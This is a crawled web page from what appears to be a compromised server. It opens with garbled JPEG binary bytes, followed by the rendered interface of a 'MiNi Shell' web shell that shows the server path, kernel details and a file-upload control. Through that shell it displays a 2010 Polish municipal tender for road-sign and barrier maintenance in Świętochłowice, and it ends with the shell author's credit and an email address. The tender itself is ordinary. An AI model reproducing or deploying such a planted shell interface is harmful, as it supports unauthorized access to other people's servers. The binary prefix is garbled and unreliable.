JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/12410-N-2010.html

<p class="kh_header"><b>Świętochłowice: Bieżące utrzymanie oznakowania pionowego oraz urządzeń bezpieczeństwa ruchu drogowego na drogach będących w zarządzie Prezydenta Miasta Świętochłowice</b><br>
<b>Numer ogłoszenia: 12410 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świętochłowice reprezentowana przez Prezydenta Miasta Świętochłowice , ul. Katowicka 54, 41-600 Świętochłowice, woj. śląskie, tel. 032 2453031, 6527500, faks 032 2454976,3491812.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swietochlowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie oznakowania pionowego oraz urządzeń bezpieczeństwa ruchu drogowego na drogach będących w zarządzie Prezydenta Miasta Świętochłowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest bieżące utrzymanie oznakowania pionowego oraz urządzeń bezpieczeństwa ruchu drogowego na drogach będących w zarządzie Prezydenta Miasta Świętochłowice.
Na drogach będących w zarządzie Prezydenta Miasta Świętochłowice zlokalizowanych jest ogółem:
1.ok. 2.000 sztuk znaków i tablic,
2.ok. 2.600 mb barierek ulicznych,
3.ok. 14.000 mb drogowych barier ochronnych.
1.	Bieżące utrzymanie oznakowania pionowego oraz urządzeń bezpieczeństwa ruchu drogowego polega na:
1.1.     prostowaniu przekrzywionych słupków i tarcz znaków;
1.2.	wymianie uszkodzonych i nieczytelnych znaków;
1.3.	montażu nowego oznakowania;
1.4.	prostowaniu przekrzywionych barier ulicznych oraz malowaniu barier;
1.5.	montażu i wymianie uszkodzonych urządzeń bezpieczeństwa ruchu drogowego;
1.6.	kontroli oznakowania pionowego oraz urządzeń bezpieczeństwa ruchu drogowego zlokalizowanego na drogach będących w zarządzie Prezydenta Miasta Świętochłowice;
1.7.	utrzymaniu znaków w należytej czystości;
1.8.	usuwaniu wyjątkowych zagrożeń bezpieczeństwa ruchu drogowego min. montażu brakującego oznakowania wynikający z kradzieży, dewastacji, którego brak może być przyczyną wystąpienia zagrożenia bezpieczeństwa ruchu drogowego;
1.9.	zapewnieniu przestrzeni magazynowej w celu przechowywania w niej zdemontowanych elementów oznakowania pionowego oraz urządzeń bezpieczeństwa ruchu drogowego;
1.10.	posiadaniu na stanie magazynowym oraz ustawieniu w nagłych przypadkach znaków drogowych oraz innych zabezpieczeń;

Zakres czynności związanych z bieżącym utrzymanie oznakowania pionowego oraz urządzeń bezpieczeństwa ruchu drogowego obejmuje:

pkt. 1.6 - codzienną kontrolę oznakowania pionowego oraz urządzeń bezpieczeństwa ruchu drogowego zlokalizowanego na drogach będących w zarządzie Prezydenta Miasta Świętochłowice (raz w tygodniu kontrola winna być dokonywana w obecności przedstawiciela zamawiającego) oraz składania raz w tygodniu zbiorczego raportu wg załącznika nr 2 z dokonanych kontroli;

pkt. 1.7  - utrzymanie w należytej czystości znaków poprzez mycie ich minimum 2 razy w roku, w tym po okresie zimowym, środkami nie pogarszającymi własności użytkowych lica znaku oraz bieżącym usuwaniu w okresie zimowym śniegu z lica znaków;

pkt. 1.8 - w razie stwierdzenia podczas kontroli przeprowadzanej przez Wykonawcę lub w sytuacji przyjęcia zgłoszenia telefonicznego funkcjonariuszy Policji, Straży Miejskiej, Straży Pożarnej lub pracowników Centrum Zarządzania Kryzysowego powstania sytuacji wyjątkowego zagrożenia bezpieczeństwa ruchu drogowego w postaci braku lub zniszczenia oznakowania pionowego lub urządzeń bezpieczeństwa ruchu drogowego (w szczególności dotyczy to znaków A20, A30, A7, B1, B2, B21, B22, B20, B23, C1 - C8, D3, D6, D6a, D6b). Wykonawca niezwłocznie powiadamia (w godzinach pracy Urzędu Miejskiego w Świętochłowicach) o tym fakcie Zamawiającego i ustala zasady i zakres likwidacji zagrożenia. Poza godzinami pracy Urzędu Miejskiego 
w Świętochłowicach niezwłocznie przystępuje do usuwania zagrożenia, a Zamawiającemu przedstawia dokumentację zdjęciową wykonanych robót wraz z opisem wykonanych prac oraz raport według załącznika nr 3.

pkt. 1.9 - zapewnienie przestrzeni magazynowej w celu przechowywania w niej zdemontowanych elementów oznakowania pionowego oraz urządzeń bezpieczeństwa ruchu drogowego z odzysku. Ocena stanu technicznego zdemontowanych elementów będzie przeprowadzana na żądanie zamawiającego. Elementy nadające się do ponownego wykorzystania, Wykonawca zobowiązany jest przechowywać do czasu ich ponownego montażu. Inne elementy nie nadające się do wykorzystania Wykonawca zobowiązany jest zutylizować zgodnie z aktualnie obowiązującymi przepisami. Należności uzyskane z zutylizowanych elementów  będą pomniejszały wartości faktur za zamówione oznakowanie lub roboty;

pkt. 1.10 - posiadanie na stanie magazynowym oraz ustawieniu w nagłych przypadkach znaków drogowych oraz innych zabezpieczeń obejmuje poniższe oznakowanie:

	8 kompletów znaków umieszczonych na jednym słupku A - 30 + B - 33 (ograniczenie prędkości do 30 km h + tabliczka z napisem uszkodzona nawierzchnia jezdni),
	6  kompletów znaków  B - 36 z tabliczką na czas zalegania śniegu,
	5  kompletów znaków  B - 36,
	3 komplety znaków  B - 1,
	2 komplety znaków  B - 2, B - 21, B - 22, A - 14, A - 12c,  A - 12b, B - 33 (ograniczenie prędkości do 40 km h) oraz  B - 33 (ograniczenie prędkości do 50kmh),
pachołki drogowe typu U - 55 - 20 sztuk,
4 komplety barier drogowych z grupy U - 3c,
4 komplety barier drogowych z grupy U - 3d
1 komplet znaku F - 9 wraz 1 szt. tabliczki o treści Nie dotyczy mieszkańców ul. Licealnej i Nastolatków,
1 kompletna bariera drogowa U - 20b wraz z tarczą znaku B - 1.

Przez komplet znaków wymienionych powyżej rozumie się - tarczę znaku wraz  z elementami mocującymi, słupek oraz przenośną podstawę.

2.	Zasady realizacji zleconych robót

Podstawą wykonywania prac związanych z realizacją bieżącego utrzymania oznakowania pionowego oraz urządzeń bezpieczeństwa ruchu drogowego na drogach będących w zarządzie Prezydenta Miasta Świętochłowice jest zlecenie, wydane w formie pisemnej, dostarczone faxem, pocztą elektroniczną lub telefonicznie (za późniejszym potwierdzeniem pisemnym).
Zlecenie telefonicznie może wydać osoba sprawująca ze strony Zmawiającego nadzór nad realizacją zadania (w godzinach urzędowania) a w sytuacjach związanych z zagrożeniem bezpieczeństwa ruchu drogowego także funkcjonariusz Policji, Straży Miejskiej, Straży Pożarnej lub pracownik Centrum Zarządzania Kryzysowego.
O fakcie realizacji zleceń Wykonawca powinien niezwłocznie poinformować Zamawiającego wraz z przedstawieniem dokumentacji zdjęciowej i raportem z wykonanych robót (wg załącznika nr 3). 

3. Kontrola, odbiór robót oraz wymagania do stosowanych materiałów:

Zamawiający wspólnie z Wykonawcą dokonywać będzie przeglądu kontrolnego w celu stwierdzenia jakości prowadzonych prac utrzymaniowych.
Zastosowane materiały muszą bezwzględnie spełniać wymogi określone w rozporządzeniu Ministra Infrastruktury z dnia 23 lipca 2003 r.  w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach. (Dz. U. Nr 220 poz. 2181)
	Wykonawca ponosić będzie pełną odpowiedzialność wobec osób trzecich, za szkody wynikłe z niewłaściwego stanu technicznego oznakowania pionowego i urządzeń bezpieczeństwa ruchu drogowego na terenie miasta.
Producent zakupionych materiałów tj. znaków drogowych winien posiadać: 
-certyfikat uprawniający do oznakowania wyrobów znakiem bezpieczeństwa B dla znaków drogowych pionowych nie odblaskowych i odblaskowych wydany przez Instytut Transportu Samochodowego, 
-świadectwo kwalifikacji dot. produkcji znaków i tablic drogowych oraz wykonywania pionowego oznakowania dróg wydane przez Instytut Badawczy Dróg i Mostów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W niniejszym postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych dotyczące :
1)posiadania  uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają  obowiązek ich posiadania,
2)posiadania  wiedzy i doświadczenia ,
2.1.) doświadczenie w świadczeniu usług związanych z bieżącym utrzymaniem  minimum 2.000sztuk znaków  i tablic przez okres minimum 12 miesięcy wykonanych , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat  przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia ,
3.1) dysponuje lub będzie dysponować co najmniej 1 pracownikiem nadzoru posiadającym uprawnienia niezbędne do wykonywania prac, wymagane przepisami Prawo budowlane tj. uprawnienia budowlane o specjalności drogowej bez ograniczeń 
4) sytuacji ekonomicznej i finansowej
5) Zgodnie z art. 26 ust. 2b ustawy wykonawca może polegać na wiedzy i doświadczeniu , potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić  zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia , w szczególności przedstawiać w tym  celu pisemne  zobowiązanie  tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów  na okres korzystania z nich przy wykonywaniu zamówienia.
6. Zgodnie  z art. 26 ust.2c  ustawy jeżeli z uzasadnionej  przyczyny wykonawca  nie może przedłożyć dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego , może przedstawić inny dokument , który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku - nie dotyczy.
 Ocena spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie wykonawcy oświadczeń i dokumentów , o których mowa w rozdziale 11 specyfikacji istotnych warunków zamówienia, których zamawiający sprawdzi kompletność , a następnie dokona sprawdzenia warunków według zasady spełnia / nie spełnia. Przy ocenie spełniania  warunków udziału w postępowaniu przez wkonawców ubiegających się wspólnie  o udzielenie zamówienia  wielkości stanowiące  o spełnianiu warunków będą zsumowane. Doświadczenia podwykonawców  będą brane pod uwagę  przy określaniu  czy wykonawca spełnia  warunki udziału..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wypełnioną kalkulację  cenową   - według załącznika nr 1. 
2. Wypełniony formularz ofertowy - według załącznika nr 4
3.Oświadczenie Wykonawcy o braku podstaw do wykluczenia z postępowania . W przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich.( załącznik nr 5).
4. Oświadczenie Wykonawcy dotyczące spełniania warunków określonych przepisami art. 22 ust. 1 ustawy Prawo zamówień publicznych. W przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich.( załącznik nr 6).
5.Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert , w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy ( załącznik nr 7).  W przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich.
6.Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji  właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. W przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich.
7.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w pkt.5 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokumenty o których mowa powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
8. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w pkt.6 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio , ze nie zalega z uciszaniem podatków, opłat, składek na ubezpieczenie społeczne  i zdrowotne , albo , że uzyskał przewidziane prawem  zwolnienie,  odroczenie lub rozłożenie  na raty  zaległych płatności  lub wstrzymanie  w całości  wykonania decyzji  właściwego organu.  Dokumenty o których mowa powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
9.Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
10. Wykaz wykonanych , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług 
związanych z bieżącym utrzymaniem  minimum 2.000sztuk znaków  i tablic przez okres minimum 12 miesięcy
w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem ich wartości , przedmiotu, dat wykonania i odbiorców 
11. Dokumenty będące załącznikiem do wykazu , o którym mowa w pkt 10  potwierdzające, że usługi zostały wykonane lub są wykonywane należycie.
12. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami,
13.Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
14. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia lub inny dokument z którego wynikać będzie, że wykonawca takimi osobami będzie dysponował, jeżeli przy realizacji zadania polegać będzie na osobach zdolnych do wykonania zamówienia innego podmiotu,

Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku składania elektronicznych dokumentów powinny być one opatrzone przez wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w § 1 ust. 2 i 3 rozporządzenia Prezesa Rady Ministrów z dnia 30.12.2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (DZ. U. Nr 226, poz.1817) kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty. 
Zamawiający będzie  żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu będzie nieczytelna lub będzie budzić wątpliwości co do jej prawdziwości. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
W przypadku,  gdy wykonawcę w przetargu reprezentuje pełnomocnik oryginał pełnomocnictwa do działania w imieniu wykonawcy lub notarialnie potwierdzony odpis takiego pełnomocnictwa. 
Wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są załączyć oryginał pełnomocnictwa do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument pełnomocnictwa powinien być dołączony do oferty i zawierać w szczególności wskazanie postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego Pełnomocnika oraz zakres jego umocowania. Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym Wykonawcę ustanowionego jako Pełnomocnika przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji danego Wykonawcy. 
Stosowne odpisy z rejestru lub ewidencji powinny zostać dołączone do oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.swietochlowice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Świętochłowice ul. Katowicka 54 
                                                                        Wydział Administracyjny  - pok. 315.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2010 godzina 10:00, miejsce: Urząd Miejski Świętochłowice ul. Katowicka 54 
                                                                        Wydział Administracyjny  - pok. 315.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com